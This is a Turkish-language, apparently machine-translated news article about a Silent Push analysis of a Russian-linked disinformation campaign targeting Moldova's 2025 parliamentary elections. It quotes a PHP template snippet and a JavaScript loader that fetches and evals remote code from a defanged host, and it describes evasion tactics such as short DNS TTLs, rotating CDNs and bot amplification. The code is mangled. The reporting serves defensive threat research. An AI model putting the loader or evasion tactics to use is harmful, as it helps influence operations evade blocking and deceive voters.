Moldova’nın 28 Eylül 2025 için planlanan parlamento seçimlerinin arifesinde, siber güvenlik araştırmacıları, Moldova’nın Avrupa yanlısı liderliğine halkın güvenini zayıflatmak için tasarlanmış sofistike bir Rus destekli dezenformasyon kampanyasını ortaya çıkardılar.
Kampanya, analistlerin hem Rumen hem de Rusça’da önyargılı haber makaleleri yayınlayan yeni kayıtlı alanların bir kümesini gözlemledikleri Nisan 2025’te ortaya çıkmaya başladı.
Bu web siteleri, Moldova’nın demokratik sürecinde kritik bir noktada anlaşmazlığı ekmek için düzenlenmiş bir çabayı gösteren, eski Rus propaganda satış noktalarıyla aynı şablonlar ve paylaşılan altyapı kullandı.
Sessiz Push analistleri kampanyayı açık kaynaklı zeka ve ağ trafik analizinin bir kombinasyonu ile tanımladılar.
İlk göstergeler arasında, iktidar koalisyonunu itibarsızlaştırmayı ve Moskova’ya doğru dönme çağrılarını güçlendirmeyi amaçlayan enflamatuar başlıklarla siyasi yorumlara ev sahipliği yapan düzinelerce URL vardı.
Sonraki araştırmalar, bu alanların her ikisi de ABSATZ olarak bilinen 2022 dezenformasyon işlemi için içerik barındıran iki özel IP adresine karar verdiğini ortaya koydu.
Araştırmacılar, kayıt meta verilerini ve barındırma kayıtlarını ilişkilendirerek, yeni Moldova hedefleme çabası ve önceki kampanyalar arasında açık bir soy oluşturdular.
Derin teknik analiz yoluyla, Silent Push analistleri, yeni sitelerin 2022 çabası için başlangıçta geliştirilen birkaç ısmarlama işlevi yeniden kullandığını belirtti.
Bu işlevler içerik üretimi, otomatik yorum denetimi ve sosyal medya yönlendirmelerinin gizli yeniden yönlendirilmesini ele aldı.
Bu kodu yeniden kullanma sadece hızlandırılmış dağıtım değil, aynı zamanda araştırmacıların farklı siteleri bağlamasını sağlayan benzersiz bir parmak izi de sağladı.
Teknik ayak izi, aşağıdaki tanımlanabilir snippet’i içeren makale şablonundan ve URL parametre ayrıştırmasından sorumlu PHP modülünde özellikle belirgindi:-
[? php
function renderStory($ storyId) {
$ seed = 'Storm1679';
$ key = substr (md5($ storyId . $ seed), 0, 8);
$ templatePath = "/var /www /html /templates /{$ key}_template[.]php";
include($ templatePath);
}
?]Her URL’deki karma parçalarını karşılaştırarak, analistler hem 2022 Absatz Altyapısı hem de 2025 Moldova kampanyasında kod tabanının evrimini izleyebilir.
Tespit kaçınma ve altyapı kalıcılığı
Kampanyanın operatörleri, geleneksel tespitten kaçınmak için altyapılarını dikkatlice mimar eden gelişmiş kalıcılık taktikleri gösterdi.
Her Dezenformasyon web sitesinde, birincil düğüm çevrimdışı alındığında sert kodlu yedekleme ana bilgisayarlarına geri dönerek, Origin IP’lerini maskelemek için dönen bir içerik dağıtım ağı (CDN’ler) ve proxy hizmetleri kullanılmıştır.
DNS kayıtları, güvenlik ekiplerinin önbellekleri sürekli olarak yenilemesine ve yayından kaldırma çabalarını karmaşıklaştırmaya zorlamak için son derece kısa TTL değerleri – genellikle beş dakikadan kısa bir sürede – yapılandırıldı.
Bir örnekte, araştırmacılar ISS düzeyinde kötü amaçlı bir etki alanına erişimi başarıyla engellediklerinde, site ziyaretçileri gizli bir JavaScript yükleyici kullanarak otomatik olarak alternatif bir alana yönlendirdi:
[script]
fetch('https://cdn.cloudproxy[.]net/get?siteId=42')
. then (res =() res[.]text())
. then (code =() eval (code));
[/script]Bu yükleyici, üçüncü taraf bir CDN’den gizlenmiş bir yük getirdi ve bu da orijinal etki alanına dokunmadan kullanıcının tarayıcısındaki dezenformasyon sitesi içeriğini rehide etti.
Kampanya, bu çift aşamalı yükleme mekanizmasını kullanarak alan kara listelemesinde hayatta kalabilir ve önemli bir kesinti olmadan makaleler yayınlamaya devam edebilir.
Operasyonel güvenliği korumak için, yeni içerik güncellemeleri için tüm komut ve kontrol etkileşimleri, standart olmayan bağlantı noktaları kullanılarak TLS şifreli kanallar üzerinden gerçekleştirildi.
Aynı limanlar 2022 ABSATZ kampanyasında gözlemlendi ve iki çaba arasındaki bağlantıyı daha da güçlendirdi.
Analistler ayrıca, sosyal medya amplifikasyonunun, yayın sürelerini değiştirerek ve spor veya yerel hava gibi nötr konularla serpiştirerek gerçek kullanıcı davranışını taklit etmek için programlanan düşük kaliteli bot hesaplarına dayandığını belirtti.
Moldova anketlere yaklaştıkça, bu kampanya, demokratik kurumları gizli etki operasyonlarından savunmak için teknik işbirliğinin ve gerçek zamanlı izlemenin öneminin altını çizmektedir.
Silent Push, proaktif savunma önlemleri için kurumsal müşteriler için mevcut ayrıntılı telemetri ile Storm-1679 ağının arkasındaki gelişen altyapıyı izlemeye ve azaltmaya devam ediyor.
Daha fazla anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin– CSN’yi Google’da tercih edilen bir kaynak olarak ayarlayın.
